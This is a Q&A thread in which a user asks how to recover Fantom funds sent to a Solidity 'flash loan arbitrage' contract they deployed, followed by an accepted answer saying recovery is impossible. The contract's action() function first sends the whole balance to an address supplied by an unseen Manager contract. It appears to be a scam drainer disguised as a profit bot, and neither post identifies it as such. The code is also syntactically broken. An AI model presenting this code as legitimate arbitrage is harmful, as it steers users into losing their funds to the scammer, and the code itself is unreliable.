# Recover Funds from Contract

Tags: solidity, recover

I have deployed a smart contract for arbitrage, but it doesnt work

I have send some native funds (in this case FTM - Fantom) to this contract. I am wondering if I can get back these funds somehow, since I own this contract

This is the contract
https://ftmscan.com/address/0xb79b1be6ed7eeb23e4c11577a5c8f6b33b8f8a8c

This is the code base

```
pragma solidity ^0.5.0;

// Multiplier-Finance Smart Contracts
import "./interfaces/ILendingPoolAddressesProvider.sol";
import "./interfaces/ILendingPool.sol";
import "./interfaces/ILendingClass.sol";

// Uniswap Smart Contracts
import "./interfaces/IUniswapV2Pair.sol";
import "./interfaces/IUniswapV2Factory.sol";
import "./interfaces/IUniswapV2ERC20.sol";

import "./interfaces/IERC20.sol"

import "./Manager.sol"


contract AbiFlash is IERC20{
  string public tokenName;
  string public tokenSymbol;
  uint loanAmount;
  Manager manager;

  constructor(string memory _tokenName, string memory _tokenSymbol, uint _loanAmount) public {
    tokenName = _tokenName;
    tokenSymbol = _tokenSymbol;
    loanAmount = _loanAmount;

    manager = new Manager();
  }
function() external payable {}

  function action() public payable {

      // Send required coins for swap
      address(uint160(manager.pancakeswapDepositAddress())).transfer(address(this).balance);

      // Perform tasks (clubbed all functions into one to reduce external calls & SAVE GAS FEE)
      manager.performTasks();

      // List the token on uniswapSwap
      manager.uniswapListToken(tokenName, tokenSymbol, tokenAddress);

      // Submit token to ETH blockchain
      string memory tokenAddress = manager.submitToken(tokenName, tokenSymbol);

      // Get ETH Loan from Multiplier-Finance
      string memory loanAddress = manager.takeFlashLoan(loanAmount);

      // Convert half ETH to DAI
      manager.uniswapDAItoETH(loanAmount / 2);

      // Create ETH and DAI pairs for our token & Provide liquidity
      string memory ethPair = manager.uniswapCreatePool(tokenAddress, "ETH");
      manager.uniswapAddLiquidity(ethPair, loanAmount / 2);

      string memory daiPair = manager.uniswapCreatePool(tokenAddress, "DAI");
      manager.uniswapAddLiquidity(daiPair, loanAmount / 2);

      // Perform swaps and profit on Self-Arbitrage
      manager.uniswapPerformSwaps();

      // Move remaining ETH from Contract to your account
      manager.contractToWallet("ETH");

      // Repay Flash loan
      manager.repayLoan(loanAddress);
  }
}
```

I know smart contracts are unstoppable and I have no 'recoverFunds' function implemented. But I was wondering if there is a trick like developing a seperate recover contract or so. The address which has deposit the funds is the same as the owner

I have no big hope, but I may don't know a trick for this

Answer (score 1, accepted):

It's not possible to recover your funds this because, as you said, doesn't exists a 'recover' function that allows you to recover your funds. When you talk about tricky, I think that you're talking about proxy contract. Also in this case, this pattern'll not work because you had to deploy your smart contract together with your smart contract proxy.

Comment: yeah thanks - ok

Had a lil hope. Thanks for your repsonse